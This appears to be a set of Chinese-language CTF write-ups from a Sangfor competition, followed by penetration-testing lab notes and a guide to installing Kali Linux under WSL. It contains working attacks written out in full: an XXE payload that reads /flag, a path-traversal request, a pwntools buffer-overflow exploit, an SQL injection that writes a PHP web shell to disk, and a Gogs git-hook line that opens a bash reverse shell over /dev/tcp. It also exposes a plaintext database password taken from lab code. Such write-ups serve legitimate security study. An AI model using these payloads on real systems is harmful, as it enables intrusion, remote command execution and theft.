Web

XXEXXE

 <? php

 $requestMethod = $_SERVER['REQUEST_METHOD'];

 if ($requestMethod == 'GET') {
     highlight_file("exploit.php");
     exit();
 }


 $result = null;

 libxml_disable_entity_loader(false);
 $xmlfile = file_get_contents('php://input');

 $pattern = '/system[\s]*\"file/i';

 if (preg_match($pattern, $xmlfile, $matches)) {
     echo "xxe attack!!!";
     exit();
 }

 $pattern2 = '/system[\s][" \']http/i';
 if (preg_match($pattern2, $xmlfile, $matches2)) {
     echo "xxe attack!!!";
     exit();
 }



 try {
     $dom = new DOMDocument();
     $dom - > loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
     $creds = simplexml_import_dom($dom);

     $code = $creds - > code;


     $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 1, $code);


 } catch (Exception $e) {
     $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 3, $e - > getMessage());
 }

 header('Content-Type: text/html; charset=utf-8');
 echo $result; ?>

exp

POST /exploit.php HTTP/2
Host: xvmw7efenlmzdxdu.ctfw.edu.sangfor.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
X-Forwarded-For: 127.0.0.1
X-Real-Ip: 92.14.194.117
Priority: u=0, i
Te: trailers
Content-Length: 165

<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flag" >
]>
<creds>
  <code>&xxe;</code>
</creds>

ReadFlag

题目提示是在 demo1的路径，查看demo1的代码即可

漏洞代码

//  
// Source code recreated from a .class file by IntelliJ IDEA  
// (powered by FernFlower decompiler)  
//  
  
package com.test.demos.web;  
  
import java.io.File;  
import java.io.FileInputStream;  
import java.io.IOException;  
import java.io.OutputStream;  
import javax.servlet.http.HttpServletRequest;  
import javax.servlet.http.HttpServletResponse;  
import org.apache.commons.io.IOUtils;  
import org.springframework.web.bind.annotation.CrossOrigin;  
import org.springframework.web.bind.annotation.RequestMapping;  
import org.springframework.web.bind.annotation.RequestMethod;  
import org.springframework.web.bind.annotation.RestController;  
  
@RestController  
@RequestMapping({"/pubfunc"})  
@CrossOrigin(  
    origins = {"*"}  
)  
public class PubfuncController {  
    public PubfuncController() {  
    }  
  
    @RequestMapping(  
        value = {"/previewpdf"},  
        method = {RequestMethod.GET}  
    )  
    public void rptPreview(HttpServletRequest req, HttpServletResponse response) {  
        String filepath = req.getParameter("filepath");  
        FileInputStream fileInputStream = null;  
  
        try {  
            String strPdfpath = filepath;  
            File file = new File(strPdfpath);  
            fileInputStream = new FileInputStream(file);  
            response.setHeader("Content-Disposition", "attachment;fileName=test.pdf");  
            response.setContentType("multipart/form-data");  
            OutputStream outputStream = response.getOutputStream();  
            IOUtils.write(IOUtils.toByteArray(fileInputStream), outputStream);  
        } catch (Exception var16) {  
        } finally {  
            if (fileInputStream != null) {  
                try {  
                    fileInputStream.close();  
                } catch (IOException var15) {  
                }  
            }  
  
        }  
  
    }  
}

GET /demo1/pubfunc/previewpdf?filepath=../../../../../../flag HTTP/1.1
Host: ctfx.edu.sangfor.com.cn:42994
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Real-Ip: 92.14.194.117
Priority: u=0, i

Pwn

level3

jadx 打开apk

LibSecShell.so 是梆梆加固免费版的壳

参考 常见的厂家的加固方式做一下总结_梆梆加固企业版 和 爱加密-CSDN博客

使用在线平台进行脱壳

APK加固安全测试

使用 dex-tools 将dex 转换为 jar 文件

idea 打开

//  
// Source code recreated from a .class file by IntelliJ IDEA  
// (powered by FernFlower decompiler)  
//  
  
package com.example.myapplication;  
  
import android.os.Bundle;  
import android.view.View;  
import android.widget.Button;  
import android.widget.EditText;  
import android.widget.Toast;  
import androidx.appcompat.app.AppCompatActivity;  
import com.example.myapplication.R.id;  
import com.example.myapplication.R.layout;  
import java.io.ByteArrayOutputStream;  
import java.io.IOException;  
import java.io.InputStream;  
import java.util.zip.Inflater;  
  
public class MainActivity extends AppCompatActivity implements View.OnClickListener {  
    byte[] map = null;  
    EditText password = null;  
  
    public MainActivity() {  
    }  
  
    public static byte[] decompress(byte[] var0) throws IOException {  
        Inflater var1 = new Inflater();  
        var1.setInput(var0);  
        ByteArrayOutputStream var4 = new ByteArrayOutputStream(var0.length);  
        byte[] var2 = new byte[1024];  
  
        while(!var1.finished()) {  
            try {  
                var4.write(var2, 0, var1.inflate(var2));  
            } catch (Exception var3) {  
                break;  
            }  
        }  
  
        var4.close();  
        return var4.toByteArray();  
    }  
  
    public boolean checkPassword(byte[] var1, String var2) {  
        int var3 = 1;  
        int var4 = 1;  
        char[] var7 = var2.toCharArray();  
        int var6 = var7.length;  
        int var5 = 0;  
  
        while(var5 < var6) {  
            switch (var7[var5]) {  
                case 'a':  
                    --var4;  
                    break;  
                case 'd':  
                    ++var4;  
                    break;  
                case 's':  
                    ++var3;  
                    break;  
                case 'w':  
                    --var3;  
                    break;  
                default:  
                    return false;  
            }  
  
            switch (var1[var3 * 11 + var4]) {  
                case 35:  
                    return false;  
                case 36:  
                    return true;  
                case 42:  
                default:  
                    ++var5;  
            }  
        }  
  
        return false;  
    }  
  
    public void onClick(View var1) {  
        try {  
            InputStream var4 = this.getResources().getAssets().open("map");  
            byte[] var2 = new byte[var4.available()];  
            this.map = var2;  
            var4.read(var2);  
            if (var4.read(this.map) == 0) {  
                Exception var5 = new Exception();  
                throw var5;  
            }  
  
            this.map = decompress(this.map);  
        } catch (Exception var3) {  
            Toast.makeText(this, "something wrong", 0).show();  
        }  
  
        if (this.checkPassword(this.map, this.password.getText().toString())) {  
            Toast.makeText(this, "you are right flag is md5(your input)(lower case~)", 0).show();  
        } else {  
            Toast.makeText(this, "wrong input!", 0).show();  
        }  
  
    }  
  
    protected void onCreate(Bundle var1) {  
        super.onCreate(var1);  
        this.setContentView(layout.activity_main);  
        Button var2 = (Button)this.findViewById(id.button);  
        this.password = (EditText)this.findViewById(id.editTextText);  
        var2.setOnClickListener(this);  
    }  
}

二维地图

############****#****##*#*###*#*##*#*****#*##*#######*##*#*******##*#*#*#*#*##*#*#*#*#*####*#*#*####***#*#**$############

密码为

ddssddddwwddssssaassssdd

flag 为

Sangfor{a7bfaf2c2d38fea97b8ecc0919cdff04}

Crypto

Random-dlp

解密基于 MT19937 的随机数生成器

1. 数据读取：

   • 从 output.txt 文件中读取四个序列，包括两个用于验证的大整数 p 和 g，以及两个密钥序列 c 和 random_list。

2. 初始化和数据分解：

   • 使用读取的 random_list 的前两项作为 N 和 gift，这两个数用于后续的数学运算和验证。

3. 递归分解：

   • 定义了一个递归函数 fac(p, q)，用来分解整数 N，寻找符合给定条件的二进制表示的因子。
   • 这个过程通过二进制探索（0和1的添加），并在满足特定模运算条件时进行进一步递归。

4. MT19937 预测器使用：

   • 利用 ExtendMT19937Predictor 类的方法，设置已知的随机状态并进行“回退”操作以恢复更早的状态。
   • 这包括多次回退操作来逐步恢复到初始的随机种子状态。

5. 计算和输出最终结果：

   • 最终通过恢复的种子生成特定格式的标志字符串 flag。

     from extend_mt19937_predictor import ExtendMT19937Predictor
      import sys
      sys.setrecursionlimit(3000)
     
      f = open("output.txt",'r').readlines()
      p = eval(f[0])
      g = eval(f[1])
      c = eval(f[2])
     
      random_list = eval(f[3])
     
      \# 分解
      N = random_list[0]
      gift = random_list[1]
     
      def fac(p,q):
        if len(p) == 1024:
          pp = int(p,2)
          if N % pp == 0:
            print(f"num1 = {pp}")
            print(f"num2 = {N // pp}")
        else:
          l = len(p)
          pp = int(p,2)
          qq = int(q,2)
          if (pp ^ qq) % (2 ** l) == gift % (2**l) and pp * qq % (2**l) == N % (2**l):
            fac('1' + p,'1' + q)
            fac('0' + p,'1' + q)
            fac('1' + p,'0' + q)
            fac('0' + p,'0' + q)
     
      \# fac('1','1')
     
      num1 = 127954378905954473979599580543506133734470934402921187567126328044915399136783613004594347893231249786782113863929878799565038392492182148282608301947643527866047185811106214065159313666530775740342170598378474744062316856449855121227117986037506212272472581097517909639356259473022026193056598279705883312493
      num2 = 39590745269613494512251071983478757508814280272882049594849029032543594900913069786771939178626302619505593605829896534613681707527396968070583148545044036306348014204000427687094161885558852315374684881011665955520787218713536145424007912730740353898075406161865607017294126568950247058934097741037059441349
     
      tmp = [num1,num2] + random_list[2:]
      D = []
      for i in range(len(tmp)):
        D.append(tmp[i] >> 32)
     
      predictor = ExtendMT19937Predictor()
     
      predictor.setrandbits(g,128)
      for i in range(len(D)):
        predictor.setrandbits(D[i],992)
     
      for i in range(len(D)):
        predictor.backtrack_getrandbits(992)
     
      predictor.backtrack_getrandbits(128)
      predictor.backtrack_getrandbits(32)
     
      m = predictor.backtrack_getrandbits(128)
      flag = b'Sangfor{'+str(m).encode()+b'}'
      print(flag)
     

Misc

OF

ida打开，发现是栈溢出

把后门地址覆盖ret地址 getshell

from pwn import *
context.log_level = "debug"


sh = remote ("ctfx.edu.sangfor.com.cn", 41682)

def g():
    global sh
    gdb.attach(sh,'''
        brva 0x00011FC
    ''')
    pause()

sh.sendline(82*b"a" + p32(0xC8E51295))

sh.interactive()

勒索病毒

感觉是签到题，直接010打开发现flag

利用方法

nmap

• nmap 超快速扫描全端口

┌──(root㉿Learning)-[~]
└─# nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -p- 192.168.208.147
Warning: Your --min-parallelism option is pretty high!  This can hurt reliability.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:14 CST
Initiating SYN Stealth Scan at 14:14
Scanning 192.168.208.147 [65535 ports]
Discovered open port 22/tcp on 192.168.208.147
Discovered open port 17445/tcp on 192.168.208.147
Discovered open port 30455/tcp on 192.168.208.147
192.168.208.147 timed out during SYN Stealth Scan (0 hosts left)
Completed SYN Stealth Scan at 14:14, 30.12s elapsed (1 host timed out)
Nmap scan report for 192.168.208.147
Host is up (0.14s latency).
Skipping host 192.168.208.147 due to host timeout
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 30.21 seconds
           Raw packets sent: 114701 (5.047MB) | Rcvd: 24 (1.040KB)

• 慢速全端口

┌──(root㉿Learning)-[~]
└─# nmap -p- 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:16 CST
Nmap scan report for 192.168.208.147
Host is up (0.099s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE  SERVICE
22/tcp    open   ssh
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
17445/tcp open   unknown
30455/tcp open   unknown
50080/tcp open   unknown

Nmap done: 1 IP address (1 host up) scanned in 376.11 seconds

• 详细信息扫描

┌──(root㉿Learning)-[~]
└─# nmap -p 22,111,139,443,445,17445,30455,50080 -sC -sV 192.168.208.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-26 14:25 CST
Nmap scan report for 192.168.208.147
Host is up (0.13s latency).

PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
17445/tcp open   unknown
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Mon, 26 Aug 2024 06:25:51 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>Issue Tracker</title>
|     <link href="/css/bootstrap.min.css" rel="stylesheet" />
|     </head>
|     <body>
|     <section>
|     <div class="container mt-4">
|     <span>
|     <div>
|     href="/login" class="btn btn-primary" style="float:right">Sign In</a>
|     href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
|     </div>
|     </span>
|     <br><br>
|     <table class="table">
|     <thead>
|     <tr>
|     <th>ID</th>
|     <th>Message</th>
|     <th>P
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Mon, 26 Aug 2024 06:25:51 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Mon, 26 Aug 2024 06:25:51 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
30455/tcp open   http         nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: W3.CSS
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.46 (Unix) PHP/7.4.15
| http-methods:
|_  Potentially risky methods: TRACE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port17445-TCP:V=7.94SVN%I=7%D=8/26%Time=66CC1FEF%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,623,"HTTP/1\.1\x20200\x20\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Control:\x20no-
SF:cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPragma:\x20no-c
SF:ache\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20t
SF:ext/html;charset=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Mon,\x
SF:2026\x20Aug\x202024\x2006:25:51\x20GMT\r\nConnection:\x20close\r\n\r\n\
SF:n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n\t<head>\n\x20\x20\x20\x20\
SF:t<meta\x20charset=\"UTF-8\">\n\x20\x20\x20\x20\t<title>Issue\x20Tracker
SF:</title>\n\t\t<link\x20href=\"/css/bootstrap\.min\.css\"\x20rel=\"style
SF:sheet\"\x20/>\n\t</head>\n\t<body>\n\t\x20\x20\x20\x20<section>\n\t\t<d
SF:iv\x20class=\"container\x20mt-4\">\n\t\t\t<span>\n\x20\t\t\t\n\t\x20\x2
SF:0\x20\x20\x20\x20\x20\x20<div>\n\t\x20\x20\x20\x20\x20\x20\x20\x20\t<a\
SF:x20href=\"/login\"\x20class=\"btn\x20btn-primary\"\x20style=\"float:rig
SF:ht\">Sign\x20In</a>\x20\n\t\x20\x20\x20\x20\x20\x20\x20\x20\t<a\x20href
SF:=\"/register\"\x20class=\"btn\x20btn-primary\"\x20style=\"float:right;m
SF:argin-right:5px\">Register</a>\n\t\x20\x20\x20\x20\x20\x20\x20\x20</div
SF:>\n\x20\x20\x20\x20\x20\x20\x20\x20</span>\n\t\t\t<br><br>\n\t\t\t<tabl
SF:e\x20class=\"table\">\n\t\t\t<thead>\n\t\t\t\t<tr>\n\t\t\t\t\t<th>ID</t
SF:h>\n\t\t\t\t\t<th>Message</th>\n\t\t\t\t\t<th>P")%r(HTTPOptions,12B,"HT
SF:TP/1\.1\x20200\x20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nX-Content-Type-Opti
SF:ons:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nCache-Contr
SF:ol:\x20no-cache,\x20no-store,\x20max-age=0,\x20must-revalidate\r\nPragm
SF:a:\x20no-cache\r\nExpires:\x200\r\nX-Frame-Options:\x20DENY\r\nContent-
SF:Length:\x200\r\nDate:\x20Mon,\x2026\x20Aug\x202024\x2006:25:51\x20GMT\r
SF:\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x2
SF:0\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20e
SF:n\r\nContent-Length:\x20435\r\nDate:\x20Mon,\x2026\x20Aug\x202024\x2006
SF::25:51\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x2
SF:0lang=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\
SF:x20Request</title><style\x20type=\"text/css\">body\x20{font-family:Taho
SF:ma,Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;backgro
SF:und-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px
SF:;}\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:
SF:black;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}
SF:</style></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x
SF:20Request</h1></body></html>");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.69 seconds

dirsearch

• 50080端口站点

┌──(root㉿Learning)-[~/Desktop/tools/SpringBoot-Scan]
└─# dirsearch -u http://192.168.208.147:50080 -x 404
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/tools/SpringBoot-Scan/reports/http_192.168.208.147_50080/_24-08-26_14-30-13.txt

Target: http://192.168.208.147:50080/

[14:30:13] Starting:
[14:30:23] 301 -  239B  - /4  ->  http://192.168.208.147:50080/4/
[14:30:43] 301 -  243B  - /cloud  ->  http://192.168.208.147:50080/cloud/
[14:30:44] 302 -    0B  - /cloud/  ->  http://192.168.208.147:50080/cloud/index.php/login
[14:30:48] 403 -  994B  - /error/
[14:30:53] 200 -    1KB - /images/
[14:30:53] 301 -  244B  - /images  ->  http://192.168.208.147:50080/images/

• 17445端口站点

┌──(root㉿Learning)-[~]
└─# dirsearch -u http://192.168.208.147:17445 -x 404
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.208.147_17445/_24-08-26_14-30-00.txt

Target: http://192.168.208.147:17445/

[14:30:00] Starting:
[14:30:09] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[14:30:10] 400 -  435B  - /a%5c.aspx
[14:30:42] 200 -    1KB - /login
[14:30:42] 302 -    0B  - /logout  ->  http://192.168.208.147:17445/index
[14:30:53] 200 -    2KB - /register

• 30455端口
• 就一个phpinfo页面

┌──(root㉿Learning)-[/home/nosuger]
└─# dirsearch -u 192.168.208.147:30455 -x 404
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/nosuger/reports/_192.168.208.147_30455/_24-08-26_14-51-37.txt

Target: http://192.168.208.147:30455/

[14:51:37] Starting:
[14:51:45] 301 -  169B  - /4  ->  http://192.168.208.147:30455/4/
[14:52:21] 200 -   68KB - /phpinfo.php

• 这里能看到该phpinfo.php文件所在的路径为/srv/http/phpinfo.php

• 访问

• 根据报错页面猜测为Springboot

• 通过弱口令admin/admin登录nextcloud

• 在nextcloud上发现了17445端口的issuetracker站点源码

• applocation.properties内容

spring.datasource.url=jdbc:mysql://localhost:3306/issue_tracker?serverTimeZone=UTC
spring.datasource.username=issue_user
spring.datasource.password=ManagementInsideOld797
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
spring.jpa.hibernate.ddl-auto=update
server.port=17445

• 审计代码发现\issuetracker\src\main\java\com\issue\tracker\issues文件存在sql注入

@GetMapping("/issue/checkByPriority")
public String checkByPriority(@RequestParam("priority") String priority, Model model) {
    // 
    // Custom code, need to integrate to the JPA
    //
    Properties connectionProps = new Properties();
    connectionProps.put("user", "issue_user");
    connectionProps.put("password", "ManagementInsideOld797");
    try {
        conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);
        String query = "SELECT message FROM issue WHERE priority='"+priority+"'";
        System.out.println(query);
        Statement stmt = conn.createStatement();
        stmt.executeQuery(query);

    } catch (SQLException e1) {
        // TODO Auto-generated catch block
        e1.printStackTrace();
    }
    
    // TODO: Return the list of the issues with the correct priority
    List<Issue> issues = service.GetAll();
    model.addAttribute("issuesList", issues);
    return "issue_index";
    
}

• 提示get请求不允许，尝试使用post

• 存在时间注入

POST /issue/checkByPriority?priority=a HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=30088FF3AD052A6051D2780EE5703394
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184

• sql注入写shell

' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/shell.php' -- - 

POST /issue/checkByPriority?priority=%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%22%63%6d%64%22%5d%29%3b%20%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%73%72%76%2f%68%74%74%70%2f%73%68%65%6c%6c%2e%70%68%70%27%20%2d%2d%20%2d HTTP/1.1
Host: 192.168.208.147:17445
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=EC38F554A66AC8357BC260892A329708
Upgrade-Insecure-Requests: 1
Priority: u=0, i
X-Forwarded-For: 208.54.104.184
X-Real-Ip: 208.54.104.184

---

开篇

我在做offsec 课程lab 的时候，总是需要启动Kali虚拟机，每次的话就特别麻烦。但有的操作不需要在Kali Linux当中完成。

所以就想到了使用 基于Windows的Linux子系统 来安装KaliLinux

安装

控制面板 -> 程序 -> 启用或关闭Windows功能

• 勾选适用于Linux的Windows子系统

• wsl -l -o 查看当前 WSL 支持的Linux 发行版

C:\Users\Try>wsl -l -o
以下是可安装的有效分发的列表。
使用 'wsl.exe --install <Distro>' 安装。

NAME                                   FRIENDLY NAME
Ubuntu                                 Ubuntu
Debian                                 Debian GNU/Linux
kali-linux                             Kali Linux Rolling
Ubuntu-18.04                           Ubuntu 18.04 LTS
Ubuntu-20.04                           Ubuntu 20.04 LTS
Ubuntu-22.04                           Ubuntu 22.04 LTS
Ubuntu-24.04                           Ubuntu 24.04 LTS
OracleLinux_7_9                        Oracle Linux 7.9
OracleLinux_8_7                        Oracle Linux 8.7
OracleLinux_9_1                        Oracle Linux 9.1
openSUSE-Leap-15.6                     openSUSE Leap 15.6
SUSE-Linux-Enterprise-15-SP5           SUSE Linux Enterprise 15 SP5
SUSE-Linux-Enterprise-Server-15-SP6    SUSE Linux Enterprise Server 15 SP6
openSUSE-Tumbleweed                    openSUSE Tumbleweed

C:\Users\Try>

• wsl 安装kali linux

wsl --install -d kali-linux

• 进入系统

#Windows cmd 执行
wsl

• 更新源
• ---上面的是具有特殊硬件的源地址,不要删。下面的是官方的源，以满足更多的工具需求

┌──(test㉿Learning)-[/tmp]
└─# cat /etc/apt/sources.list
# See: https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/
deb http://http.kali.org/kali kali-last-snapshot main contrib non-free non-free-firmware

# Additional line for source packages
deb-src http://http.kali.org/kali kali-last-snapshot main contrib non-free non-free-firmware

#----------

deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

• 切换安装路径(默认是安装在C盘的，换至其他盘)

# 导出到指定路径
wsl --export kali-linux D:\Downloads\kali.tar

#注销并删除当前分发版本
wsl --unregister kali-linux

#导入镜像
wsl --import kali-linux F:\wsl-kali D:\Downloads\kali.tar --version 2

• 但是导入创建的wsl的默认用户是root，不希望权限太高
• 在/etc/wsl.conf中写入以下内容。没有这个文件就创建。来设置登录要使用的用户。

• 然后在cmd中使用wsl --shutdown

[user]
default=nosuger
[automount]
enabled = false
[interop]
appendWindowsPath = false
[boot]
systemd=true

• 安装完整工具包

sudo apt install kali-linux-everything

• 安装图形化界面

sudo apt update && apt install kali-desktop-xfce

• 安装xrdp

apt install xrdp 
systemctl start xrdp 
systemctl enable xrdp

wsl端口映射

• 然后需要openvpnip的地址映射到本地才能访问
• 该脚本需要powershell 版本大于 7
• 下载地址:在 Windows 上安装 PowerShell - PowerShell | Microsoft Learn
• github:Cheng-pi/wslp2l: wsl port to localhost (github.com)

---

Nmap

root@linux:~/SpringBoot-Scan# nmap -p 1-65535 -Pn 0.0.0.0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-02 10:22 BST
Nmap scan report for 0.0.0.0

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
222/tcp   open  rsh-spx
2181/tcp  open  eforward
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
3000/tcp  open  ppp
3305/tcp  open  odette-ftp
6689/tcp  open  tsa
8888/tcp  open  sun-answerbook
9090/tcp  open  zeus-admin
9092/tcp  open  XmlIpcRegSvc
10005/tcp open  stel
38018/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 375.04 seconds

Getshell

发现目标使用docker 启了一个 Gogs 容器，且是未安装的状态

通过安装后对Gogs 进行getshell

创建一个仓库

个人信息-> 仓库设置 -> 管理Git钩子

在其中添加一段文本，curl那段

``里面为执行的命令，我直接执行反弹shell的命令，也可以执行其他的命令比如id

这样就启用一个http端口，然后就会请求，执行的结果在请求日志里面

点击更新钩子设置

curl http://192.168.49.51/`bash -c 'bash -i >& /dev/tcp/192.168.49.51/1234 0>&1'`

然后使用首页的命令来push一些内容上去，即可触发命令执行getshell

touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add test http://192.168.51.224:8000/jane/111.git
git push -u test master

docker 容器逃逸

CDK 工具

使用自动化探测工具

• CDK Home CN · cdk-team/CDK Wiki (github.com)

f861030b02b4:/tmp$ ./cdk_linux_amd64 evaluate --full
./cdk_linux_amd64 evaluate --full
CDK (Container DucK)
CDK Version(GitCommit): 306f3ced50188ab2c41e0e924c1cde35ecbb520d
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/

[  Information Gathering - System Info  ]
2024/08/02 09:41:36 current dir: /tmp
2024/08/02 09:41:36 current user: git uid: 1000 gid: 1000 home: /data/git
2024/08/02 09:41:36 hostname: f861030b02b4
2024/08/02 09:41:36 alpine alpine 3.17.7 kernel: 3.10.0-1160.el7.x86_64
2024/08/02 09:41:36 Setuid files found:
    /usr/bin/chage
    /usr/bin/chfn
    /usr/bin/chsh
    /usr/bin/expiry
    /usr/bin/gpasswd
    /usr/bin/passwd

[  Information Gathering - Services  ]
2024/08/02 09:41:36 sensitive env found:
    SSH_ORIGINAL_COMMAND=1
2024/08/02 09:41:36 service found in process:
    61    58    sshd

[  Information Gathering - Commands and Capabilities  ]
